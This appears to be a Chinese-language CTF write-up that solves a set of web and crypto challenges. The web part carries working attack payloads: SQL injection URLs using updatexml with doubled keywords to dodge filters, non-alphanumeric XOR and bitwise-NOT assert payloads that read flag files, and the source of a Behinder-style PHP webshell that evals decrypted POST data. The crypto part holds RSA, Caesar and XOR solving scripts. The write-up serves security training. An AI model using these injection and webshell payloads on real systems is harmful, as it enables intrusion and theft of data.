WEB
来签个到吧
这个题考脑洞,打开链接一看url感觉不太对劲,是D0G.php,题目提示了不是DOG吗,所以访问DOG.php,提交得到flag。
代码审计
第一层是extract($_GET);可以变量覆盖,所以只要构造a和b值为空就行,具体payload如下
http://47.103.62.94:8080/t/3/index.php?a=&b=
得到第二层地址,把GET id的值json解码然后键key对应的值与dm+in比较相等输出flag,注意+在url解码后是空格
http://47.103.62.94:8080/t/3/1.php?id={"key":"dm%2bin"} //%2b为+号的url编码
http://47.103.62.94:8080/t/3/1.php?id={"key":0} //也可以这样,用php的弱类型比较,整型与字符型比较时字符型会保留前面的数字与整型比较,这里"dm+in"没有数字所以为0
得到GNalVNrh2PqsbR0-cOLEUPKJx页面title有说XXencode,网上找一个在线XXdecode的网站解码就行。
Look at my wife
打开链接是md5的强碰撞,去网上找一下,这里直接用payload
http://sec.jxust.edu.cn:8892/?username=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&password=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
得到Flag:IZQWWZK7MZWDIZ27NFJV6SLOL5GVSV2JIZCS42DUNVWA====,base32解码得到Fake_fl4g_iS_In_MYWIFE.html进去MYWIFE.html页面,看了下源码,有个HK416_NO.1.docx,把下下来就行,打开看到一张图片,图片后面有白颜色的代码,是一个加密过程
<?php
$password="=pJovuTsLMJoRSwozO2ZtEIqP1TozAas";
function encode($str){
$_o=strrev($str);
// echo $_o;}
for($_0=0; $_0<strlen($_o);$_0++){$_c=substr($_o,$_0,1);
$__=ord($_c)+1;
$_c=chr($__);
$_=$_.$_c;}
return str_rot13(strrev(base64_encode($_)));
}
highlight_file(__FILE__);
/*
逆向加密算法,解密$password就是flag
*/
?>
根据条件写出解密算法,跑一下就有flag
<?php
error_reporting(0);
$a='flag{WelC0me_2_StAlker}';
$password="=pJovuTsLMJoRSwozO2ZtEIqP1TozAas";
function encode($str){
$_o=strrev($str);
for($_0=0; $_0<strlen($_o);$_0++){$_c=substr($_o,$_0,1);
$__=ord($_c)+1;
$_c=chr($__);
$_=$_.$_c;}
return str_rot13(strrev(base64_encode($_)));
}
function decode($str){
$_o=base64_decode(strrev(str_rot13($str)));
for($_0=0; $_0<strlen($_o);$_0++){$_c=substr($_o,$_0,1);
$__=ord($_c)-1;
$_c=chr($__);
$_=$_.$_c;}
return strrev($_);
}
var_dump(encode($a));
var_dump(decode($password));
eazysql
考察sql注入,过滤了一些关键字为空可以双写绕过,过滤了注释字符,考虑一下闭合后面字符就行,这里用xpath注入。
http://sec.jxust.edu.cn:8893/login.php?username=1&password=1' aandnd updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) oorr '1'='1 //查链接数据库
http://sec.jxust.edu.cn:8893/login.php?username=1&password=1' aandnd updatexml(1,concat(0x7e,(selselectect group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),0x7e),1) oorr '1'='1 //查表名
http://sec.jxust.edu.cn:8893/login.php?username=1&password=1' aandnd updatexml(1,concat(0x7e,(seleselectct group_concat(column_name) from infoorrmation_schema.columns where table_name="Sta1KeL"),0x7e),1) oorr '1'='1 //查列名
http://sec.jxust.edu.cn:8893/login.php?username=1&password=1' aandnd updatexml(1,concat(0x7e,(seselectlect group_concat(flag) from Sta1KeL),0x7e),1) oorr '1'='1 //读数据
Fake_bypass
网上可以找到原题,就是无数字字母getshell,可以通过异或构造出_GET进行绕过.
http://172.16.43.117:8894/?code=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=readfile("flag.php"); //提示flag在flag.php读这个文件得到flag
```
## 你了解webshell吗
考察冰蝎马二进制传输过waf的原理,网上有很多解析,随便找一下就行,打开链接是个欢迎页面,提示了有后门,所以扫一下目录发现shell.php存在,外面用了一个师傅的免杀马,就是通过异或出create_function执行命令的,把里面的base64解码,得到要执行的php内容
```php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
$key=substr(md5(uniqid(rand())),15);
$_SESSION['k']=$key;
print $key;
}
else
{
$key=$_SESSION['k'];
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i
这就是一个冰蝎php后门,大概内容就是通过传参pass获得key,用于下面的解密,然后判断是否有openssl扩展,有就用AES256解密POST传的参数,没有就base64编码POST传的参数一位一位与key异或,最后把POST的值eval执行。这个题是存在openssl扩展的,所以直接用AES256解密就行。
首先通过GET传参pass获得key,把key代入下面加密代码,cmd是要执行的命令,POST传cmd的值就能执行命令,探测得到flag在根目录,读一下就能得到flag
<?php
$key='e68c9ddec9974df73';
$cmd='eval|readfile("../../../../flag");';
$cmd=openssl_encrypt($t, "AES256", $key);
var_dump($cmd);
?>
eazy_hash
打开链接,发现cookie的值很奇怪,将cookie对应flag的值改为1,出现源码,
发现考hash长度扩展攻击,去网上找一下hash长度扩展攻击,也就是如果我们知道secret的长度&data的值&secret+data的MD5值,我们就能构造出secret+data+其他值的MD5,这里用hashpump,根据题意如下构造,返回的结果即是要用的payload,把/x换成%
请求报文
POST /t/4/index.php HTTP/1.1
Host: 47.103.62.94:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: sample-hash=faa3f6dfec1fff03a413f5482110efeb; flag=1;set=165b40d54846374d6c51a62574cdeb50;
Connection: close
Content-Length: 164
cat=www&dog=mmm%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80%00%00%00%00%00%00%00hello
当然也有简单的方法,可以两次url编码绕过,因为代码内部又url解码了一次,所以只需POST传参cat=www&dog=mm%256D即可,cookie里面set的值为sample-hash的值,请求报文如下
POST /t/4/index.php HTTP/1.1
Host: 47.103.62.94:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Origin: http://47.103.62.94:8080
Connection: close
Referer: http://47.103.62.94:8080/t/4/index.php
Cookie: flag=1;set=faa3f6dfec1fff03a413f5482110efeb;
Upgrade-Insecure-Requests: 1
cat=www&dog=mm%256D
Real_bypass
还是绕过,这次过滤的更多,可以这样构造payload,~是取反的意思
(~%9E%8C%8C%9A%8D%8B)((~%91%9A%87%8B)((~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C)()));
//(assert)((next)((getallheaders)()));
<?php
$a = 'assert';
echo urlencode(~$a); //取反的字符串可以这样得到
所以构造如下请求,得到flag
你真的懂php弱类型吗?
查看源码,也是json_decodePOST传参cat的值,将cat的name键对应的值与md5($flag)比较,md5($flag)返回的是一个字符类型,是==弱比较,整型与字符型弱比较时字符型会保留前面的数字与整型比较,所以只要知道md5($flag)返回的字符串前面是什么数字就能构造name的值与其相等,所以爆破
POST传参cat={“name”:905},name为905时得到了flag
Simple upload
上传.jpg|.png|.gif格式文件,只要文件内容包含了eval就有flag。
crypto
Crypto_qiandao
凯撒解密,列出所有组合,然后将组和的内容分别base64解码,即可得到flag
import base64
a = 'VitdV3pZyjhszC9byPBdxh9gUPX9 WjueW3qAzkitaD9czQCeyi9hVQY9 XkvfX3rBaljubE9daRDfzj9iWRZ9 YlwgY3sCbmkvcF9ebSEgak9jXSA9 ZmxhZ3tDcnlwdG9fcTFhbl9kYTB9 AnyiA3uEdomxeH9gdUGicm9lZUC9 BozjB3vFepnyfI9heVHjdn9mAVD9 CpakC3wGfqozgJ9ifWIkeo9nBWE9 DqblD3xHgrpahK9jgXJlfp9oCXF9 ErcmE3yIhsqbiL9khYKmgq9pDYG9 FsdnF3zJitrcjM9liZLnhr9qEZH9 GteoG3aKjusdkN9mjAMois9rFAI9 HufpH3bLkvtelO9nkBNpjt9sGBJ9 IvgqI3cMlwufmP9olCOqku9tHCK9 JwhrJ3dNmxvgnQ9pmDPrlv9uIDL9 KxisK3eOnywhoR9qnEQsmw9vJEM9 LyjtL3fPozxipS9roFRtnx9wKFN9 MzkuM3gQpayjqT9spGSuoy9xLGO9 NalvN3hRqbzkrU9tqHTvpz9yMHP9 ObmwO3iSrcalsV9urIUwqa9zNIQ9 PcnxP3jTsdbmtW9vsJVxrb9aOJR9 QdoyQ3kUtecnuX9wtKWysc9bPKS9 RepzR3lVufdovY9xuLXztd9cQLT9 SfqaS3mWvgepwZ9yvMYaue9dRMU9 TgrbT3nXwhfqxA9zwNZbvf9eSNV9 UhscU3oYxigryB9axOAcwg9fTOW9'
a = a.split(' ')
for i in a:
if 'flag' in str(base64.b64decode(i)):
print(str(base64.b64decode(i)))
break
keyboard&xor
键盘密码就是一些通过键盘构成的特殊密码,这个题的键盘密码就是用数字小键盘按数字的顺序形成一个数字,如987456963,就是9,以此类推得到所有数字,然后与某个字符异或得到flag,脚本如下
a = '92 86 91 93 65 121 72 67 74 78 85 101 81 95 67 88 10 91 72 94 101 91 84 94 101 66 10 72 71'
a = a.split(' ')
for i in range(127):
flag = ''
for j in a:
flag += chr(int(j)^i)
if 'flag' in flag:
print(flag)
easyRSA
这个是n1,n2不互素,求出最大公约数就是q,然后解出p1,p2进行正常解密就行,脚本如下
from Crypto.Util.number import *
import gmpy2
e = 65537
c1=8217750002563767534507431772672508296790419426359418772262918334942253216838941784065552586515975086629488401848295042795010878472841239208134141867327484743385831827070290102156043891062216546700396355633648746503609316467427792284160550518479557705522433207344486446182975506177779645254798026639207181194801224136301709747692124321259015904882481700734109471769429997266769417563302187369593695274785460459216589287933295897729160407432706119895236061234908823057523578639028050157204710971446984874388372614521839413035519832095286571396291205385892316414519095084590885365387638866410682826642459036672376812420
c2=7566958532364114371379519385215370017067741031765877004281206882402131583243640141134242845467979956404950887130100847667426239722484679901620095620477253353118237604524293040400048854766849424968226100958218253784453428802739541285102299539470357988946181084507613000676093180667509014760578303938444875206744223207398915216384207864783675876491715222331647605993719708006088981895093221324357784664757018489923072318925185804618124840229459330521303045652927504098937604785690215649325059881930727158435990766774702128811742126044954713159721156690583264083241605623057819784364016191197778255205802326634502169696
n1=10425855462477614367171844445208386014622992692425050430074260102448039387454490304367721918509254546358600675710952184926594800391631253396820479320653692178348490464690117898982202182578852738594728823182103111997498480266825426495100627852400368723752243942103284180615156393358735994546872055150565842883752045496888724915186648706000896778069408685995048316382587065830704528191510082579196492638015354803103072820328602730238598347726753089546703609506564170483974497918695544327858337881157517174537224885086474762136147878595490511738317991477047221966892259425234398288202574664650814814670543089879462250969
n2=15766515110295605564479758756980032411600879599379970189803549903544315261085553399160478480793501696012780244509160285700738510494592955881281143435749183974011608784346311244159008079262826595051533934706654747847164739010394791761987521164465315988661975937464230956081568828495008905487030195067877389050231912641823229802644494531530922336348933549500757527878066616013388198512155005420703673647050852840240731929014547634366702023974552173767124792655844658582669224827093172065195618610066498220346107563221399597149406536016187287501864888625698709398126479414379109790233198536518016678629137174151079459577
q=gmpy2.gcd(n1,n2)
d1=gmpy2.invert(e, ((n1//q)-1)*(q-1))
d2=gmpy2.invert(e, ((n2//q)-1)*(q-1))
m1=pow(c1,d1,n1)
m2=pow(c2,d2,n2)
print(long_to_bytes(m1)+long_to_bytes(m2))
babyRSA
两个考点p1,q1很近可以直接yafu分解,dp泄露,脚本如下
from Crypto.Util.number import *
import gmpy2
def getd(n,e,dp):
for i in range(1,e):
if (dp*e-1)%i == 0:
if n%(((dp*e-1)/i)+1)==0:
p=((dp*e-1)/i)+1
q=n/(((dp*e-1)/i)+1)
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)%phi
return d
e=0x10001
dp=3313676147488780004269677749256530901164938685290852713293300135880283216593908718566212310632642274940720655574256172230630003501500729135540846569105660318596269962068874656306135529587693293761755261353082087502945162831629675013563304150693764812713605383584459176590153145253110379580397788632833285641
n2=17432371702511515641445330758319580626663835675360471973889541567061362733282602303912273385937275050062522598535126155185966929079633740081171122748299420273977074317730453158885377058943056439513171310361138512553197254939991672337230416762443960791144958841650587111759212146297769349905342027165943673502891841884114610862014679819295175751627124593991961564859661169919768049005016586846043963736105950274061217008822022603496817050696352383629819970702916983094803063512834021610106011942581931071298837201673797067979789462413929658249907770382419444868832257390670216903194832006080879462891030786345473321133
c2=12039881757941343412566057609539484250906321411525729350503269767314350877712930485694511109088253977591466330425070524867736378047759843349518537860124696107006690623895116470242801205088950874464072733610260908059982241202766245703075624293105596666232574063769116003161520032496604039664346670808953369545524155173270105041618573868757634570091100968119166159870155019375609120473339022486872441267292089879088332792816065043145052419237476543791727962075323440574841576944978498759899553193900743991497821146941242255543632363744542861361156010435583675699157817000644519248637092574815930152213087352532188592236
d1=getd(n2,e,dp)
q=pow(c2,d1,n2)
d2=126718357524005693199390161485378637487639343479947998145083561526434871754408140645858881434806063952980258381684375375095954560284254431735241422492047511150982868431114487453945585382221632069457530876447279703911027394728366834783989367847061198620195031826238305731687819004936696803996919443755803404113167559388751413481508580650942784818218845465868367257899677609280414120762380578192746466003247059826487671090866019437630335330595101656654671248347192139710892796727299548717597826123118839289089380822802211376863209871172990463591165599847134356947900941387262536298663354702834924433042510620537009241
c1=6356252143515671855198429881212517870779878618691332923958890647806354452901807941882999374435080560683815150770484395767015510644241357101868959549127328190332610890837788541658702731818713528860989158535390733727768504788767637350164165980590153557477739470795029639701049906017962346848213813923317335790141930549253902882156104051473800652660782956891921403666427334040512683189894667722064736359509822113994604002527654800241703193672245774608801241223636582862073637323810794035377798134552028666324286312078516226824625724078306007237092650085065991784923888316685985201158014227419609844622958359406645985866
n1=9320696966386937278572876558100179309795083786358419701946511079414098978864922910783000575300656580568425581998259157079308163880302113010810905842717528325815897023984231385262886452519258250208797083108558215437953986945356876825183289787421829151483413917840830350996211665686348258634731885056592691016315043001324043314137965371102358327534065151196334696138709658120811355017315442831025731822209288250615896139373943549158050126660940574640185787748492894432092789180810792921338770995378783752751356503128348500016213467149492807309171151272392869146889490973107762610701245020894293925853248451646602996787
p=pow(c1,d2,n1)
c=4461687424952987605077068597182085166355058890306839578319318982197773270190553004498479395450654210533909382216598556174622636994760707731600493050272837180910221890015116602106069968316931560604914259087855357823329266045866623160528901285175543852317432452682769794293027990726303364460155079615395804248896868158028788409736439387465612986259994251848414228017014841266164456780697508091228072832822395424974788680330410616962493185884334664701874110914830070153216651626683234516621551208392165699559108092244902223135252877798422199307045880823773676790722880935438200146601433088987352732879249827866286031477
d=gmpy2.invert(e, (p-1)*(q-1))
m=pow(c,d,p*q)
print(long_to_bytes(m))